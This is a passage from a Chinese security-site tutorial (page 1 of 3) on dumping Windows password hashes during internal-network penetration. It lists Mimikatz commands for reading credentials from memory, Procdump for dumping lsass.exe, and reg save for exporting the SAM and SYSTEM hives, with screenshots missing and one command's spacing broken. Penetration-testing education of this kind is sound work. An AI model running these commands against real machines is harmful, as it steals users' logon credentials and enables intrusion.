侵權(quán)投訴
訂閱
糾錯(cuò)
加入自媒體
當(dāng)前位置: OFweek 安防網(wǎng)   >   平臺(tái)軟件   >  正文

內(nèi)網(wǎng)滲透—獲取Windows內(nèi)Hash密碼方法總結(jié)

1、直接讀取

Mimikatz讀取明文密碼和hash時(shí)需要管理員權(quán)限。

privilege::debug           //提升至debug權(quán)限

sekurlsa::logonpasswords   //抓取密碼

image.png

image.png

2、Procdump+Mimikatz離線(xiàn)讀取lsass.dmp文件

Procdump是微軟官方發(fā)布的工具,可以用來(lái)將目標(biāo)lsass文件導(dǎo)出。先在目標(biāo)機(jī)器上上傳Procdump,導(dǎo)出lsass.dmp

procdump64.exe-accepteula-ma

lsass.exe lsass.dmp

image.png

image.png

將目標(biāo)機(jī)上的lsass.dmp下載到本地后,執(zhí)行Mimikatz導(dǎo)出lsass.dmp里面的密碼和hash:

sekurlsa::minidump 目錄lsass.dmp //將導(dǎo)出的lsass.dmp載入到Mimikatz中

sekurlsa::logonpasswords full    //獲取密碼

3、通過(guò)SAM和System文件抓取密碼和Hash

首先利用注冊(cè)表命令將目標(biāo)機(jī)的sam或者system文件導(dǎo)出

reg save hklmsam sam.hive

reg save hklmsystem system.hive

image.png

然后將目標(biāo)機(jī)上的sam.hive和system.hive下載到本地,利用Mimikatz讀取sam和system文件獲取NTLMHash:

token::elevate

lsadump::sam

image.png

image.png

<上一頁(yè)  1  2  3  下一頁(yè)>  
聲明: 本文由入駐維科號(hào)的作者撰寫(xiě),觀(guān)點(diǎn)僅代表作者本人,不代表OFweek立場(chǎng)。如有侵權(quán)或其他問(wèn)題,請(qǐng)聯(lián)系舉報(bào)。

發(fā)表評(píng)論

0條評(píng)論,0人參與

請(qǐng)輸入評(píng)論內(nèi)容...

請(qǐng)輸入評(píng)論/評(píng)論長(zhǎng)度6~500個(gè)字

您提交的評(píng)論過(guò)于頻繁,請(qǐng)輸入驗(yàn)證碼繼續(xù)

  • 看不清,點(diǎn)擊換一張  刷新

暫無(wú)評(píng)論

暫無(wú)評(píng)論

    文章糾錯(cuò)
    x
    *文字標(biāo)題:
    *糾錯(cuò)內(nèi)容:
    聯(lián)系郵箱:
    *驗(yàn) 證 碼:

    粵公網(wǎng)安備 44030502002758號(hào)